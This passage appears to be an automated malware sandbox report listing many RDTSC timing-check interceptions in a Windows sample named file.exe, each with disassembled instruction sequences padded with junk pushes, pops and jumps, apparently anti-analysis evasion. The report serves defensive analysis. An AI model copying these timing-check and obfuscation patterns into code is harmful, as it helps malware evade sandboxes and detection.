                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 593F89 second address: 593FA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F789C73D5B2h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 593FA0 second address: 593FC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789CC61492h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007F789CC6148Eh 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 593FC2 second address: 593FC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DFDE2 second address: 5DFE6E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F789CC6148Dh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F789CC61488h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 mov dl, 2Fh 0x0000002a xor dword ptr [ebp+1248483Dh], ebx 0x00000030 lea eax, dword ptr [ebp+12491B75h] 0x00000036 push 00000000h 0x00000038 push eax 0x00000039 call 00007F789CC61488h 0x0000003e pop eax 0x0000003f mov dword ptr [esp+04h], eax 0x00000043 add dword ptr [esp+04h], 0000001Ah 0x0000004b inc eax 0x0000004c push eax 0x0000004d ret 0x0000004e pop eax 0x0000004f ret 0x00000050 js 00007F789CC6148Bh 0x00000056 sbb di, 4480h 0x0000005b jmp 00007F789CC61492h 0x00000060 mov ecx, dword ptr [ebp+122D3B4Dh] 0x00000066 push eax 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b push esi 0x0000006c pop esi 0x0000006d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DFE6E second address: 5DFE74 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DFE74 second address: 5BD463 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov edx, dword ptr [ebp+122D3B19h] 0x00000013 call dword ptr [ebp+122D1F44h] 0x00000019 je 00007F789CC614A3h 0x0000001f jmp 00007F789CC6148Fh 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DFEF5 second address: 5DFEFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E034D second address: 421C32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F789CC61494h 0x0000000e nop 0x0000000f jmp 00007F789CC61494h 0x00000014 push dword ptr [ebp+122D0825h] 0x0000001a or dword ptr [ebp+1246AF5Bh], edx 0x00000020 mov edi, 2E501714h 0x00000025 call dword ptr [ebp+122D2509h] 0x0000002b pushad 0x0000002c pushad 0x0000002d mov edi, dword ptr [ebp+122D3B49h] 0x00000033 popad 0x00000034 xor eax, eax 0x00000036 mov dword ptr [ebp+122D1953h], edi 0x0000003c mov edx, dword ptr [esp+28h] 0x00000040 jmp 00007F789CC61495h 0x00000045 mov dword ptr [ebp+122D3A41h], eax 0x0000004b xor dword ptr [ebp+122D1953h], ecx 0x00000051 sub dword ptr [ebp+122D23D4h], edi 0x00000057 mov esi, 0000003Ch 0x0000005c jmp 00007F789CC61492h 0x00000061 add esi, dword ptr [esp+24h] 0x00000065 je 00007F789CC61492h 0x0000006b jbe 00007F789CC6148Ch 0x00000071 mov dword ptr [ebp+122D1953h], ebx 0x00000077 lodsw 0x00000079 clc 0x0000007a add eax, dword ptr [esp+24h] 0x0000007e pushad 0x0000007f mov bh, 82h 0x00000081 jbe 00007F789CC61486h 0x00000087 popad 0x00000088 mov ebx, dword ptr [esp+24h] 0x0000008c cld 0x0000008d nop 0x0000008e push ecx 0x0000008f push eax 0x00000090 push edx 0x00000091 jns 00007F789CC61486h 0x00000097 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E03F2 second address: 5E043C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F789C73D5B1h 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F789C73D5ABh 0x00000011 push esi 0x00000012 push edx 0x00000013 pop edx 0x00000014 pop esi 0x00000015 popad 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a push ebx 0x0000001b jns 00007F789C73D5B1h 0x00000021 pop ebx 0x00000022 mov eax, dword ptr [eax] 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 jp 00007F789C73D5A6h 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E043C second address: 5E044B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jns 00007F789CC61486h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E044B second address: 5E0485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jmp 00007F789C73D5B8h 0x0000000f pop eax 0x00000010 mov edx, 03E2B802h 0x00000015 push C725E319h 0x0000001a pushad 0x0000001b push edx 0x0000001c jp 00007F789C73D5A6h 0x00000022 pop edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E0485 second address: 5E0489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E093B second address: 5E0941 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E0941 second address: 5E0972 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b and cl, FFFFFFCEh 0x0000000e push 00000004h 0x00000010 mov cl, ah 0x00000012 push eax 0x00000013 pushad 0x00000014 jmp 00007F789CC61499h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c pop eax 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E0E3B second address: 5E0E41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60F6A2 second address: 60F6AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F789CC61486h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60F6AC second address: 60F6CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789C73D5B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60F6CB second address: 60F6D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60F81C second address: 60F822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60F822 second address: 60F83D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f jns 00007F789CC61488h 0x00000015 push edx 0x00000016 pop edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60F83D second address: 60F841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60FB4E second address: 60FB53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60FF5E second address: 60FF66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60FF66 second address: 60FF74 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F789CC61492h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60FF74 second address: 60FF8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F789C73D5A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnl 00007F789C73D5D4h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60FF8A second address: 60FF8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60FF8E second address: 60FFAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F789C73D5B0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F789C73D5A6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6100AF second address: 6100BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F789CC6148Bh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618865 second address: 61886A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618AB5 second address: 618AC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F789CC6148Bh 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618AC9 second address: 618AD1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61933B second address: 619345 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F789CC6148Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6194BC second address: 6194CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F789C73D5ADh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61C2C6 second address: 61C2E9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F789CC6149Dh 0x0000000c jmp 00007F789CC61497h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61C2E9 second address: 61C2F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F789C73D5A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61C2F3 second address: 61C324 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F789CC61495h 0x0000000e push eax 0x0000000f pop eax 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 js 00007F789CC6149Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61C324 second address: 61C32E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F789C73D5A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61C498 second address: 61C49E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61C49E second address: 61C4BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F789C73D5B1h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61E81C second address: 61E823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622564 second address: 62256D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622021 second address: 622027 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622027 second address: 62202C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6222C6 second address: 6222D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F789CC61486h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6222D2 second address: 622323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jmp 00007F789C73D5B1h 0x00000012 jnl 00007F789C73D5CCh 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e pop eax 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622323 second address: 622338 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789CC61491h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 623BCC second address: 623C05 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F789C73D5C6h 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007F789C73D5AAh 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 623C05 second address: 623C1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jno 00007F789CC6148Ah 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 629EF3 second address: 629F1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F789C73D5A6h 0x00000009 jng 00007F789C73D5A6h 0x0000000f popad 0x00000010 je 00007F789C73D5BEh 0x00000016 jmp 00007F789C73D5B2h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62876A second address: 628772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 628772 second address: 62877C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6288D6 second address: 6288DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 628C01 second address: 628C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 628C09 second address: 628C12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 628C12 second address: 628C1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F789C73D5A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 628D8F second address: 628DA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F789CC6148Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 628DA2 second address: 628DBF instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F789C73D5A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F789C73D5B1h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 628F09 second address: 628F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 628F15 second address: 628F1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 628F1C second address: 628F54 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F789CC6148Fh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ebx 0x0000000d push edi 0x0000000e pop edi 0x0000000f jl 00007F789CC61486h 0x00000015 pop ebx 0x00000016 pushad 0x00000017 jne 00007F789CC61486h 0x0000001d jmp 00007F789CC6148Fh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6291E8 second address: 6291EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6291EC second address: 6291F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6291F0 second address: 6291F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62DB98 second address: 62DB9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62CF27 second address: 62CF61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789C73D5AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007F789C73D5B7h 0x0000000f push eax 0x00000010 jmp 00007F789C73D5AEh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62D6C6 second address: 62D6E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F789CC61495h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62D6E2 second address: 62D6EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F789C73D5ACh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 634B92 second address: 634BAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F789CC61490h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 632E3E second address: 632E50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F789C73D5AAh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 632E50 second address: 632E56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633112 second address: 63311C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F789C73D5A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63311C second address: 633149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F789CC6148Dh 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f jmp 00007F789CC61496h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6336FC second address: 63370F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jno 00007F789C73D5A8h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63370F second address: 633713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633713 second address: 633723 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789C73D5ACh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633973 second address: 633979 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 634244 second address: 63424A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63424A second address: 63424E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63486D second address: 634876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 634876 second address: 63488D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789CC61493h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63488D second address: 6348F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F789C73D5B6h 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 popad 0x00000012 jne 00007F789C73D5E7h 0x00000018 jl 00007F789C73D5D3h 0x0000001e jmp 00007F789C73D5B6h 0x00000023 jmp 00007F789C73D5B7h 0x00000028 jl 00007F789C73D5AEh 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 638521 second address: 638536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F789CC6148Dh 0x00000009 pop edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 638536 second address: 638547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F789C73D5A6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 638547 second address: 63854D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63854D second address: 638551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
